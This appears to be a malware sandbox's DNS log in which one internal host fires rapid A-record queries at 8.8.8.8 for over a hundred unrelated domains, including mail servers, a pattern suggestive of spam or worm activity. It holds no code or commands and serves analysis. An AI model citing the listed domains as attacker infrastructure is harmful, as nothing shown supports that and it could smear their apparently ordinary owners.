                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.660108089 CEST192.168.2.48.8.8.80x736dStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.668971062 CEST192.168.2.48.8.8.80xe9d6Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.742615938 CEST192.168.2.48.8.8.80xcd41Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.750741005 CEST192.168.2.48.8.8.80xdc5Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.847661972 CEST192.168.2.48.8.8.80x5583Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.865905046 CEST192.168.2.48.8.8.80x2a09Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.891890049 CEST192.168.2.48.8.8.80x1f43Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.012051105 CEST192.168.2.48.8.8.80x23adStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.041042089 CEST192.168.2.48.8.8.80xa875Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.044956923 CEST192.168.2.48.8.8.80xef51Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.056031942 CEST192.168.2.48.8.8.80x592fStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.155796051 CEST192.168.2.48.8.8.80x80acStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.271872997 CEST192.168.2.48.8.8.80x5448Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.459153891 CEST192.168.2.48.8.8.80xdf39Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.474570036 CEST192.168.2.48.8.8.80xb96aStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.485039949 CEST192.168.2.48.8.8.80xc8fdStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.596509933 CEST192.168.2.48.8.8.80xe6d7Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.608386993 CEST192.168.2.48.8.8.80x52d3Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.661156893 CEST192.168.2.48.8.8.80x54dcStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.714871883 CEST192.168.2.48.8.8.80xe9d6Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.729489088 CEST192.168.2.48.8.8.80xc8dcStandard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.746007919 CEST192.168.2.48.8.8.80x55fbStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.747574091 CEST192.168.2.48.8.8.80xb702Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.751420021 CEST192.168.2.48.8.8.80xf3b3Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.752032995 CEST192.168.2.48.8.8.80xb1e7Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.771478891 CEST192.168.2.48.8.8.80xcf4eStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.792916059 CEST192.168.2.48.8.8.80xf554Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.794704914 CEST192.168.2.48.8.8.80x71e2Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.800744057 CEST192.168.2.48.8.8.80x3059Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.825264931 CEST192.168.2.48.8.8.80x4a5dStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.827403069 CEST192.168.2.48.8.8.80x73f3Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.829617977 CEST192.168.2.48.8.8.80xa563Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.837124109 CEST192.168.2.48.8.8.80xd361Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.849817038 CEST192.168.2.48.8.8.80x506aStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.994890928 CEST192.168.2.48.8.8.80xf95bStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.083478928 CEST192.168.2.48.8.8.80x4e0dStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.083478928 CEST192.168.2.48.8.8.80xaaa9Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.092981100 CEST192.168.2.48.8.8.80x90daStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.161564112 CEST192.168.2.48.8.8.80xf179Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.164096117 CEST192.168.2.48.8.8.80xa538Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.206001043 CEST192.168.2.48.8.8.80xdb24Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.243853092 CEST192.168.2.48.8.8.80xa84cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.274344921 CEST192.168.2.48.8.8.80xd8b2Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.291764975 CEST192.168.2.48.8.8.80x7e48Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.466686010 CEST192.168.2.48.8.8.80x4bd2Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.475497961 CEST192.168.2.48.8.8.80x6a95Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.477576971 CEST192.168.2.48.8.8.80x50b5Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.541358948 CEST192.168.2.48.8.8.80x7796Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.542437077 CEST192.168.2.48.8.8.80x4a41Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.594945908 CEST192.168.2.48.8.8.80x11c2Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.596095085 CEST192.168.2.48.8.8.80xfdacStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.599092007 CEST192.168.2.48.8.8.80xe6d7Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.649696112 CEST192.168.2.48.8.8.80xea13Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.674520969 CEST192.168.2.48.8.8.80xdfb0Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.693188906 CEST192.168.2.48.8.8.80x651Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.706872940 CEST192.168.2.48.8.8.80x96c9Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.736244917 CEST192.168.2.48.8.8.80x36c6Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.802757978 CEST192.168.2.48.8.8.80x1018Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.803368092 CEST192.168.2.48.8.8.80xf6f2Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.843053102 CEST192.168.2.48.8.8.80xd4e4Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.879853010 CEST192.168.2.48.8.8.80xfa85Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.881962061 CEST192.168.2.48.8.8.80x506aStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.884915113 CEST192.168.2.48.8.8.80x241dStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.911628008 CEST192.168.2.48.8.8.80xae3cStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.916346073 CEST192.168.2.48.8.8.80xf013Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.115767956 CEST192.168.2.48.8.8.80x80acStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.146491051 CEST192.168.2.48.8.8.80xfbb2Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.163099051 CEST192.168.2.48.8.8.80xe303Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.235430956 CEST192.168.2.48.8.8.80x9403Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.258285046 CEST192.168.2.48.8.8.80x47c4Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.285710096 CEST192.168.2.48.8.8.80x8006Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.332942009 CEST192.168.2.48.8.8.80xd8b2Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.373687029 CEST192.168.2.48.8.8.80x70cdStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.416774988 CEST192.168.2.48.8.8.80xe890Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.436412096 CEST192.168.2.48.8.8.80x2a65Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.454694986 CEST192.168.2.48.8.8.80xf3f2Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.474919081 CEST192.168.2.48.8.8.80xd395Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.487586975 CEST192.168.2.48.8.8.80xe37bStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.610979080 CEST192.168.2.48.8.8.80xa5e1Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.665149927 CEST192.168.2.48.8.8.80x4749Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.708201885 CEST192.168.2.48.8.8.80x2eaaStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.724668980 CEST192.168.2.48.8.8.80xe9d6Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.727540970 CEST192.168.2.48.8.8.80x6391Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.806734085 CEST192.168.2.48.8.8.80xc20eStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.831777096 CEST192.168.2.48.8.8.80x476aStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.833301067 CEST192.168.2.48.8.8.80x7c09Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.883516073 CEST192.168.2.48.8.8.80xc5d1Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.917659998 CEST192.168.2.48.8.8.80xad20Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.024864912 CEST192.168.2.48.8.8.80xb5d7Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.027972937 CEST192.168.2.48.8.8.80xf791Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.042640924 CEST192.168.2.48.8.8.80xf2e9Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.121078968 CEST192.168.2.48.8.8.80xeba9Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.166522026 CEST192.168.2.48.8.8.80xf718Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.195882082 CEST192.168.2.48.8.8.80x6048Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.261080980 CEST192.168.2.48.8.8.80xe565Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.293081045 CEST192.168.2.48.8.8.80xf12fStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.333046913 CEST192.168.2.48.8.8.80xa52bStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.409132004 CEST192.168.2.48.8.8.80x7784Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.481106997 CEST192.168.2.48.8.8.80xa634Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.503784895 CEST192.168.2.48.8.8.80xbaa4Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.533325911 CEST192.168.2.48.8.8.80x896Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.547930002 CEST192.168.2.48.8.8.80x2c48Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.567445993 CEST192.168.2.48.8.8.80xdc89Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.787056923 CEST192.168.2.48.8.8.80xdc8dStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.862663031 CEST192.168.2.48.8.8.80xc494Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.872383118 CEST192.168.2.48.8.8.80xe6cStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.911596060 CEST192.168.2.48.8.8.80x35d6Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.920691967 CEST192.168.2.48.8.8.80xde66Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.021426916 CEST192.168.2.48.8.8.80x30d3Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.034390926 CEST192.168.2.48.8.8.80x1422Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.035602093 CEST192.168.2.48.8.8.80xb5d7Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.073262930 CEST192.168.2.48.8.8.80xb241Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.158723116 CEST192.168.2.48.8.8.80x8153Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.382499933 CEST192.168.2.48.8.8.80xad65Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.485817909 CEST192.168.2.48.8.8.80x105cStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.489464998 CEST192.168.2.48.8.8.80xb951Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.522361994 CEST192.168.2.48.8.8.80x697bStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.724395037 CEST192.168.2.48.8.8.80x9159Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.728360891 CEST192.168.2.48.8.8.80x2cfaStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.757280111 CEST192.168.2.48.8.8.80xe1a2Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.793277025 CEST192.168.2.48.8.8.80xd88fStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.801279068 CEST192.168.2.48.8.8.80xea01Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.839114904 CEST192.168.2.48.8.8.80x5bc6Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.880029917 CEST192.168.2.48.8.8.80x6e7bStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.911195040 CEST192.168.2.48.8.8.80x6008Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.978847027 CEST192.168.2.48.8.8.80xf89dStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.052256107 CEST192.168.2.48.8.8.80xb5d7Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.211815119 CEST192.168.2.48.8.8.80x2fbfStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.211844921 CEST192.168.2.48.8.8.80xb4d2Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.260389090 CEST192.168.2.48.8.8.80x17b6Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.265326977 CEST192.168.2.48.8.8.80x373dStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.275681973 CEST192.168.2.48.8.8.80x554eStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.337358952 CEST192.168.2.48.8.8.80x2d0Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.353332043 CEST192.168.2.48.8.8.80xc54fStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.395694971 CEST192.168.2.48.8.8.80x632fStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.493293047 CEST192.168.2.48.8.8.80x105cStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.512345076 CEST192.168.2.48.8.8.80x328aStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.543333054 CEST192.168.2.48.8.8.80x58c0Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.583615065 CEST192.168.2.48.8.8.80x92fbStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.583615065 CEST192.168.2.48.8.8.80x98bStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.604669094 CEST192.168.2.48.8.8.80xab53Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.615303040 CEST192.168.2.48.8.8.80x3001Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.618376970 CEST192.168.2.48.8.8.80xba21Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.726505995 CEST192.168.2.48.8.8.80x5736Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.790977001 CEST192.168.2.48.8.8.80x2333Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.799408913 CEST192.168.2.48.8.8.80xaea6Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.816315889 CEST192.168.2.48.8.8.80x5e42Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.901540041 CEST192.168.2.48.8.8.80x1ad2Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.951232910 CEST192.168.2.48.8.8.80x880bStandard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.958947897 CEST192.168.2.48.8.8.80xad8bStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.011486053 CEST192.168.2.48.8.8.80xe4e2Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.222362995 CEST192.168.2.48.8.8.80x59f1Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.255671978 CEST192.168.2.48.8.8.80x7a37Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.339324951 CEST192.168.2.48.8.8.80x861dStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.677352905 CEST192.168.2.48.8.8.80x397bStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.699770927 CEST192.168.2.48.8.8.80x39ecStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.722924948 CEST192.168.2.48.8.8.80x5736Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.755754948 CEST192.168.2.48.8.8.80xb897Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.773644924 CEST192.168.2.48.8.8.80xf223Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.807967901 CEST192.168.2.48.8.8.80x847fStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.838239908 CEST192.168.2.48.8.8.80xa5c5Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.861493111 CEST192.168.2.48.8.8.80xd576Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.864770889 CEST192.168.2.48.8.8.80x91f8Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.885308027 CEST192.168.2.48.8.8.80x757aStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.979450941 CEST192.168.2.48.8.8.80x5babStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.056061983 CEST192.168.2.48.8.8.80xc4a3Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.056272030 CEST192.168.2.48.8.8.80x58f9Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.083796024 CEST192.168.2.48.8.8.80xa441Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.097800970 CEST192.168.2.48.8.8.80xb5d7Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.109435081 CEST192.168.2.48.8.8.80x7050Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.161786079 CEST192.168.2.48.8.8.80x51fbStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.168895960 CEST192.168.2.48.8.8.80xfd1dStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.226248980 CEST192.168.2.48.8.8.80x59f1Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.619288921 CEST192.168.2.48.8.8.80x3951Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.627598047 CEST192.168.2.48.8.8.80xf74aStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.657480001 CEST192.168.2.48.8.8.80x377bStandard query (0)esmoke.netA (IP address)IN (0x0001)false
